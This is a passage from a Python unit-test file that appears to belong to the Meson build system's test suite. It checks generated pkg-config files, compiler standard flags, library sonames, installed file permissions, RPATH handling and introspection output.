self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar') def test_pkgconfig_gen_deps(self): ''' Test that generated pkg-config files correctly handle dependencies ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir1 = self.privatedir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1}) privatedir2 = self.privatedir env = { 'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]), 'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib', } self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env) # pkg-config strips some duplicated flags so we have to parse the # generated file ourself. expected = { 'Requires': 'libexposed', 'Requires.private': 'libfoo >= 1.0', 'Libs': '-L${libdir} -llibmain -pthread -lcustom', 'Libs.private': '-lcustom2 -L${libdir} -llibinternal', 'Cflags': '-I${includedir} -pthread -DCUSTOM', } if is_osx() or is_haiku(): expected['Cflags'] = expected['Cflags'].replace('-pthread ', '') with open(os.path.join(privatedir2, 'dependency-test.pc')) as f: matched_lines = 0 for line in f: parts = line.split(':', 1) if parts[0] in expected: key = parts[0] val = parts[1].strip() expected_val = expected[key] self.assertEqual(expected_val, val) matched_lines += 1 self.assertEqual(len(expected), matched_lines) cmd = ['pkg-config', 'requires-test'] out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'requires-private-test'] out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'pub-lib-order'] out = self._run(cmd + ['--libs'], override_envvars=env).strip().split() self.assertEqual(out, ['-llibmain2', '-llibinternal']) # See common/45 pkgconfig-gen/meson.build for description of the case this test with open(os.path.join(privatedir1, 'simple2.pc')) as f: content = f.read() self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content) self.assertIn('Libs.private: -lz', content) with open(os.path.join(privatedir1, 'simple3.pc')) as f: content = f.read() self.assertEqual(1, content.count('-lsimple3')) with open(os.path.join(privatedir1, 'simple5.pc')) as f: content = f.read() self.assertNotIn('-lstat2', content) @mock.patch.dict(os.environ) def test_pkgconfig_uninstalled(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) self.build() os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled') if is_cygwin(): os.environ['PATH'] += os.pathsep + self.builddir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir) self.build() self.run_tests() def test_pkg_unfound(self): testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig') self.init(testdir) with open(os.path.join(self.privatedir, 'somename.pc')) as f: pcfile = f.read() self.assertFalse('blub_blob_blib' in pcfile) def test_vala_c_warnings(self): ''' Test that no warnings are emitted for C code generated by Vala. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/issues/864 ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '5 target glib') self.init(testdir) compdb = self.get_compdb() vala_command = None c_command = None for each in compdb: if each['file'].endswith('GLib.Thread.c'): vala_command = each['command'] elif each['file'].endswith('GLib.Thread.vala'): continue elif each['file'].endswith('retcode.c'): c_command = each['command'] else: m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file']) raise AssertionError(m) self.assertIsNotNone(vala_command) self.assertIsNotNone(c_command) # -w suppresses all warnings, should be there in Vala but not in C self.assertIn(" -w ", vala_command) self.assertNotIn(" -w ", c_command) # -Wall enables all warnings, should be there in C but not in Vala self.assertNotIn(" -Wall ", vala_command) self.assertIn(" -Wall ", c_command) # -Werror converts warnings to errors, should always be there since it's # injected by an unrelated piece of code and the project has werror=true self.assertIn(" -Werror ", vala_command) self.assertIn(" -Werror ", c_command) @skipIfNoPkgconfig def test_qtdependency_pkgconfig_detection(self): ''' Test that qt4 and qt5 detection with pkgconfig works. ''' # Verify Qt4 or Qt5 can be found with pkg-config qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore']) qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core']) testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=pkg-config']) # Confirm that the dependency was found with pkg-config mesonlog = self.get_meson_log() if qt4 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n') if qt5 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n') @skip_if_not_base_option('b_sanitize') def test_generate_gir_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() def test_qt5dependency_qmake_detection(self): ''' Test that qt5 detection with qmake works. This can't be an ordinary test case because it involves setting the environment. ''' # Verify that qmake is for Qt5 if not shutil.which('qmake-qt5'): if not shutil.which('qmake'): raise unittest.SkipTest('QMake not found') output = subprocess.getoutput('qmake --version') if 'Qt version 5' not in output: raise unittest.SkipTest('Qmake found, but it is not for Qt 5.') # Disable pkg-config codepath and force searching with qmake/qmake-qt5 testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=qmake']) # Confirm that the dependency was found with qmake mesonlog = self.get_meson_log() self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n') def glob_sofiles_without_privdir(self, g): files = glob(g) return [f for f in files if not f.endswith('.p')] def _test_soname_impl(self, libpath, install): if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames') testdir = os.path.join(self.unit_test_dir, '1 soname') self.init(testdir) self.build() if install: self.install() # File without aliases set. nover = os.path.join(libpath, 'libnover.so') self.assertPathExists(nover) self.assertFalse(os.path.islink(nover)) self.assertEqual(get_soname(nover), 'libnover.so') self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1) # File with version set verset = os.path.join(libpath, 'libverset.so') self.assertPathExists(verset + '.4.5.6') self.assertEqual(os.readlink(verset), 'libverset.so.4') self.assertEqual(get_soname(verset), 'libverset.so.4') self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3) # File with soversion set soverset = os.path.join(libpath, 'libsoverset.so') self.assertPathExists(soverset + '.1.2.3') self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3') self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2) # File with version and soversion set to same values settosame = os.path.join(libpath, 'libsettosame.so') self.assertPathExists(settosame + '.7.8.9') self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9') self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9') self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2) # File with version and soversion set to different values bothset = os.path.join(libpath, 'libbothset.so') self.assertPathExists(bothset + '.1.2.3') self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3') self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6') self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3) def test_soname(self): self._test_soname_impl(self.builddir, False) def test_installed_soname(self): libdir = self.installdir + os.path.join(self.prefix, self.libdir) self._test_soname_impl(libdir, True) def test_compiler_check_flags_order(self): ''' Test that compiler check flags override all other flags. This can't be an ordinary test case because it needs the environment to be set. ''' testdir = os.path.join(self.common_test_dir, '37 has function') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) Oflag = '-O3' OflagCPP = Oflag if cpp.get_id() in ('clang', 'gcc'): # prevent developers from adding "int main(int argc, char **argv)" # to small Meson checks unless these parameters are actually used OflagCPP += ' -Werror=unused-parameter' env = {'CFLAGS': Oflag, 'CXXFLAGS': OflagCPP} self.init(testdir, override_envvars=env) cmds = self.get_meson_log_compiler_checks() for cmd in cmds: if cmd[0] == 'ccache': cmd = cmd[1:] # Verify that -I flags from the `args` kwarg are first # This is set in the '37 has function' test case self.assertEqual(cmd[1], '-I/tmp') # Verify that -O3 set via the environment is overridden by -O0 Oargs = [arg for arg in cmd if arg.startswith('-O')] self.assertEqual(Oargs, [Oflag, '-O0']) def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None: has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0')) has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0')) has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) # Check that all the listed -std=xxx options for this compiler work just fine when used # https://en.wikipedia.org/wiki/Xcode#Latest_versions # https://www.gnu.org/software/gcc/projects/cxx-status.html key = OptionKey('std', lang=compiler.language) for v in compiler.get_options()[key].choices: # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly # thus, C++ first if '++17' in v and not has_cpp17: continue elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support continue elif '++20' in v and not has_cpp20: continue # now C elif '17' in v and not has_cpp2a_c17: continue elif '18' in v and not has_c18: continue self.init(testdir, extra_args=[f'-D{key!s}={v}']) cmd = self.get_compdb()[0]['command'] # c++03 and gnu++03 are not understood by ICC, don't try to look for them skiplist = frozenset([ ('intel', 'c++03'), ('intel', 'gnu++03')]) if v != 'none' and not (compiler.get_id(), v) in skiplist: cmd_std = " -std={} ".format(v) self.assertIn(cmd_std, cmd) try: self.build() except Exception: print(f'{key!s} was {v!r}') raise self.wipe() # Check that an invalid std option in CFLAGS/CPPFLAGS fails # Needed because by default ICC ignores invalid options cmd_std = '-std=FAIL' if compiler.language == 'c': env_flag_name = 'CFLAGS' elif compiler.language == 'cpp': env_flag_name = 'CXXFLAGS' else: raise NotImplementedError('Language {} not defined.'.format(p)) env = {} env[env_flag_name] = cmd_std with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException), msg='C compiler should have failed with -std=FAIL'): self.init(testdir, override_envvars = env) # ICC won't fail in the above because additional flags are needed to # make unknown -std=... options errors. self.build() def test_compiler_c_stds(self): ''' Test that C stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cc) def test_compiler_cpp_stds(self): ''' Test that C++ stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. ''' testdir = os.path.join(self.common_test_dir, '2 cpp') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cpp) def test_unity_subproj(self): testdir = os.path.join(self.common_test_dir, '43 subproject') self.init(testdir, extra_args='--unity=subprojects') pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p')) self.assertEqual(len(pdirs), 1) self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c')) sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p')) self.assertEqual(len(sdirs), 1) self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c')) self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c')) self.build() def test_installed_modes(self): ''' Test that files installed by these tests have the correct permissions. Can't be an ordinary test because our installed_files.txt is very basic. ''' # Test file modes testdir = os.path.join(self.common_test_dir, '12 data') self.init(testdir) self.install() f = os.path.join(self.installdir, 'etc', 'etcfile.dat') found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'rw------T' self.assertEqual(want_mode, found_mode[1:]) f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-sr-x' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) self.assertEqual(0, statf.st_gid) f = os.path.join(self.installdir, 'usr', 'share', 'progname', 'fileobject_datafile.dat') orig = os.path.join(testdir, 'fileobject_datafile.dat') statf = os.stat(f) statorig = os.stat(orig) found_mode = stat.filemode(statf.st_mode) orig_mode = stat.filemode(statorig.st_mode) self.assertEqual(orig_mode[1:], found_mode[1:]) self.assertEqual(os.getuid(), statf.st_uid) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_gid) self.wipe() # Test directory modes testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-x--t' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) def test_installed_modes_extended(self): ''' Test that files are installed with correct permissions using install_mode. ''' testdir = os.path.join(self.common_test_dir, '191 install_mode') self.init(testdir) self.build() self.install() for fsobj, want_mode in [ ('bin', 'drwxr-x---'), ('bin/runscript.sh', '-rwxr-sr-x'), ('bin/trivialprog', '-rwxr-sr-x'), ('include', 'drwxr-x---'), ('include/config.h', '-rw-rwSr--'), ('include/rootdir.h', '-r--r--r-T'), ('lib', 'drwxr-x---'), ('lib/libstat.a', '-rw---Sr--'), ('share', 'drwxr-x---'), ('share/man', 'drwxr-x---'), ('share/man/man1', 'drwxr-x---'), ('share/man/man1/foo.1', '-r--r--r-T'), ('share/sub1', 'drwxr-x---'), ('share/sub1/second.dat', '-rwxr-x--t'), ('subdir', 'drwxr-x---'), ('subdir/data.dat', '-rw-rwSr--'), ]: f = os.path.join(self.installdir, 'usr', *fsobj.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (fsobj, want_mode, found_mode))) # Ensure that introspect --installed works on all types of files # FIXME: also verify the files list self.introspect('--installed') def test_install_umask(self): ''' Test that files are installed with correct permissions using default install umask of 022, regardless of the umask at time the worktree was checked out or the build was executed. ''' # Copy source tree to a temporary directory and change permissions # there to simulate a checkout with umask 002. orig_testdir = os.path.join(self.unit_test_dir, '26 install umask') # Create a new testdir under tmpdir. tmpdir = os.path.realpath(tempfile.mkdtemp()) self.addCleanup(windows_proof_rmtree, tmpdir) testdir = os.path.join(tmpdir, '26 install umask') # Copy the tree using shutil.copyfile, which will use the current umask # instead of preserving permissions of the old tree. save_umask = os.umask(0o002) self.addCleanup(os.umask, save_umask) shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile) # Preserve the executable status of subdir/sayhello though. os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775) self.init(testdir) # Run the build under a 027 umask now. os.umask(0o027) self.build() # And keep umask 027 for the install step too. self.install() for executable in [ 'bin/prog', 'share/subdir/sayhello', ]: f = os.path.join(self.installdir, 'usr', *executable.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (executable, want_mode, found_mode))) for directory in [ 'usr', 'usr/bin', 'usr/include', 'usr/share', 'usr/share/man', 'usr/share/man/man1', 'usr/share/subdir', ]: f = os.path.join(self.installdir, *directory.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'drwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected directory %s to have mode %s but found %s instead.' % (directory, want_mode, found_mode))) for datafile in [ 'include/sample.h', 'share/datafile.cat', 'share/file.dat', 'share/man/man1/prog.1', 'share/subdir/datafile.dog', ]: f = os.path.join(self.installdir, 'usr', *datafile.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rw-r--r--' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (datafile, want_mode, found_mode))) def test_cpp_std_override(self): testdir = os.path.join(self.unit_test_dir, '6 std override') self.init(testdir) compdb = self.get_compdb() # Don't try to use -std=c++03 as a check for the # presence of a compiler flag, as ICC does not # support it. for i in compdb: if 'prog98' in i['file']: c98_comp = i['command'] if 'prog11' in i['file']: c11_comp = i['command'] if 'progp' in i['file']: plain_comp = i['command'] self.assertNotEqual(len(plain_comp), 0) self.assertIn('-std=c++98', c98_comp) self.assertNotIn('-std=c++11', c98_comp) self.assertIn('-std=c++11', c11_comp) self.assertNotIn('-std=c++98', c11_comp) self.assertNotIn('-std=c++98', plain_comp) self.assertNotIn('-std=c++11', plain_comp) # Now werror self.assertIn('-Werror', plain_comp) self.assertNotIn('-Werror', c98_comp) def test_run_installed(self): if is_cygwin() or is_osx(): raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable') testdir = os.path.join(self.unit_test_dir, '7 run installed') self.init(testdir) self.build() self.install() installed_exe = os.path.join(self.installdir, 'usr/bin/prog') installed_libdir = os.path.join(self.installdir, 'usr/foo') installed_lib = os.path.join(installed_libdir, 'libfoo.so') self.assertTrue(os.path.isfile(installed_exe)) self.assertTrue(os.path.isdir(installed_libdir)) self.assertTrue(os.path.isfile(installed_lib)) # Must fail when run without LD_LIBRARY_PATH to ensure that # rpath has been properly stripped rather than pointing to the builddir. self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0) # When LD_LIBRARY_PATH is set it should start working. # For some reason setting LD_LIBRARY_PATH in os.environ fails # when all tests are run (but works when only this test is run), # but doing this explicitly works. env = os.environ.copy() env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')]) self.assertEqual(subprocess.call(installed_exe, env=env), 0) # Ensure that introspect --installed works installed = self.introspect('--installed') for v in installed.values(): self.assertTrue('prog' in v or 'foo' in v) @skipIfNoPkgconfig def test_order_of_l_arguments(self): testdir = os.path.join(self.unit_test_dir, '8 -L -l order') self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir}) # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders # the flags before returning them to -Lfoo -Lbar -lfoo -lbar # but pkgconf seems to not do that. Sigh. Support both. expected_order = [('-L/me/first', '-lfoo1'), ('-L/me/second', '-lfoo2'), ('-L/me/first', '-L/me/second'), ('-lfoo1', '-lfoo2'), ('-L/me/second', '-L/me/third'), ('-L/me/third', '-L/me/fourth',), ('-L/me/third', '-lfoo3'), ('-L/me/fourth', '-lfoo4'), ('-lfoo3', '-lfoo4'), ] with open(os.path.join(self.builddir, 'build.ninja')) as ifile: for line in ifile: if expected_order[0][0] in line: for first, second in expected_order: self.assertLess(line.index(first), line.index(second)) return raise RuntimeError('Linker entries not found in the Ninja file.') def test_introspect_dependencies(self): ''' Tests that mesonintrospect --dependencies returns expected output. ''' testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir) glib_found = False gobject_found = False deps = self.introspect('--dependencies') self.assertIsInstance(deps, list) for dep in deps: self.assertIsInstance(dep, dict) self.assertIn('name', dep) self.assertIn('compile_args', dep) self.assertIn('link_args', dep) if dep['name'] == 'glib-2.0': glib_found = True elif dep['name'] == 'gobject-2.0': gobject_found = True self.assertTrue(glib_found) self.assertTrue(gobject_found) if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0: raise unittest.SkipTest('glib >= 2.56.2 needed for the rest') targets = self.introspect('--targets') docbook_target = None for t in targets: if t['name'] == 'generated-gdbus-docbook': docbook_target = t break self.assertIsInstance(docbook_target, dict) self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0])) def test_introspect_installed(self): testdir = os.path.join(self.linuxlike_test_dir, '7 library versions') self.init(testdir) install = self.introspect('--installed') install = {os.path.basename(k): v for k, v in install.items()} print(install) if is_osx(): the_truth = { 'libmodule.dylib': '/usr/lib/libmodule.dylib', 'libnoversion.dylib': '/usr/lib/libnoversion.dylib', 'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib', 'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib', 'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib', 'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib', 'libsome.0.dylib': '/usr/lib/libsome.0.dylib', 'libsome.dylib': '/usr/lib/libsome.dylib', } the_truth_2 = {'/usr/lib/libsome.dylib', '/usr/lib/libsome.0.dylib', } else: the_truth = { 'libmodule.so': '/usr/lib/libmodule.so', 'libnoversion.so': '/usr/lib/libnoversion.so', 'libonlysoversion.so': '/usr/lib/libonlysoversion.so', 'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5', 'libonlyversion.so': '/usr/lib/libonlyversion.so', 'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1', 'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5', 'libsome.so': '/usr/lib/libsome.so', 'libsome.so.0': '/usr/lib/libsome.so.0', 'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3', } the_truth_2 = {'/usr/lib/libsome.so', '/usr/lib/libsome.so.0', '/usr/lib/libsome.so.1.2.3'} self.assertDictEqual(install, the_truth) targets = self.introspect('--targets') for t in targets: if t['name'] != 'some': continue self.assertSetEqual(the_truth_2, set(t['install_filename'])) def test_build_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.unit_test_dir, '10 build_rpath') self.init(testdir) self.build() # C program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog')) self.assertEqual(install_rpath, '/baz') # C++ program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx')) self.assertEqual(install_rpath, 'baz') def test_global_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') if is_osx(): raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)') testdir = os.path.join(self.unit_test_dir, '81 global-rpath') oldinstalldir = self.installdir # Build and install an external library without DESTDIR. # The external library generates a .pc file without an rpath. yonder_dir = os.path.join(testdir, 'yonder') yonder_prefix = os.path.join(oldinstalldir, 'yonder') yonder_libdir = os.path.join(yonder_prefix, self.libdir) self.prefix = yonder_prefix self.installdir = yonder_prefix self.init(yonder_dir) self.build() self.install(use_destdir=False) # Since rpath has multiple valid formats we need to # test that they are all properly used. rpath_formats = [ ('-Wl,-rpath=', False), ('-Wl,-rpath,', False), ('-Wl,--just-symbols=', True), ('-Wl,--just-symbols,', True), ('-Wl,-R', False), ('-Wl,-R,', False) ] for rpath_format, exception in rpath_formats: # Build an app that uses that installed library. # Supply the rpath to the installed library via LDFLAGS # (as systems like buildroot and guix are wont to do) # and verify install preserves that rpath. self.new_builddir() env = {'LDFLAGS': rpath_format + yonder_libdir, 'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')} if exception: with self.assertRaises(subprocess.CalledProcessError): self.init(testdir, override_envvars=env) continue self.init(testdir, override_envvars=env) self.build() self.install(use_destdir=False) got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified')) self.assertEqual(got_rpath, yonder_libdir, rpath_format) @skip_if_not_base_option('b_sanitize') def test_pch_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.common_test_dir, '13 pch') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() compdb = self.get_compdb() for i in compdb: self.assertIn("-fsanitize=address", i["command"]) def test_cross_find_program(self): testdir = os.path.join(self.unit_test_dir, '11 cross prog') crossfile = tempfile.NamedTemporaryFile(mode='w') print(os.path.join(testdir, 'some_cross_tool.py')) tool_path = os.path.join(testdir, 'some_cross_tool.py') crossfile.write(textwrap.dedent(f'''\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' sometool.py = ['{tool_path}'] someothertool.py = '{tool_path}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' # Not sure if correct. endian = 'little' ''')) crossfile.flush() self.meson_cross_file = crossfile.name self.init(testdir) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '13 reconfigure') self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False) self.build('reconfigure') def test_vala_generated_source_buildir_inside_source_tree(self): ''' Test that valac outputs generated C files in the expected location when the builddir is a subdir of the source tree. ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '8 generated sources') newdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, newdir) testdir = newdir # New builddir builddir = os.path.join(testdir, 'subdir/_build') os.makedirs(builddir, exist_ok=True) self.change_builddir(builddir) self.init(testdir) self.build() def test_old_gnome_module_codepaths(self): ''' A lot of code in the GNOME module is conditional on the version of the glib tools that are installed, and breakages in the old code can slip by once the CI has a newer glib version. So we force the GNOME module to pretend that it's running on an ancient glib so the fallback code is also tested. ''' testdir = os.path.join(self.framework_test_dir, '7 gnome') mesonbuild.modules.gnome.native_glib_version = '2.20' env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"} try: self.init(testdir, inprocess=True, override_envvars=env) self.build(override_envvars=env) finally: mesonbuild.modules.gnome.native_glib_version = None @skipIfNoPkgconfig def test_pkgconfig_usage(self): testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency') testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee') if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: raise unittest.SkipTest('Glib 2.0 dependency not available.') with tempfile.TemporaryDirectory() as tempdirname: self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False) self.install(use_destdir=False) shutil.rmtree(self.builddir) os.mkdir(self.builddir) pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc'))) lib_dir = os.path.join(tempdirname, 'lib') myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = pkg_dir # Private internal libraries must not leak out. pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv) self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.') # Dependencies must not leak to cflags when building only a shared library. pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv) self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.') # Test that the result is usable. self.init(testdir2, override_envvars=myenv) self.build(override_envvars=myenv) myenv = os.environ.copy() myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')]) if is_cygwin(): bin_dir = os.path.join(tempdirname, 'bin') myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH'] self.assertTrue(os.path.isdir(lib_dir)) test_exe = os.path.join(self.builddir, 'pkguser') self.assertTrue(os.path.isfile(test_exe)) subprocess.check_call(test_exe, env=myenv) @skipIfNoPkgconfig def test_pkgconfig_relative_paths(self): testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths') pkg_dir = os.path.join(testdir, 'pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc'))) env = get_fake_env(testdir, self.builddir, self.prefix) env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='') kwargs = {'required': True, 'silent': True} relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs) self.assertTrue(relative_path_dep.found()) # Ensure link_args are properly quoted libpath = Path(self.builddir) / '../relativepath/lib' link_args = ['-L' + libpath.as_posix(), '-lrelativepath'] 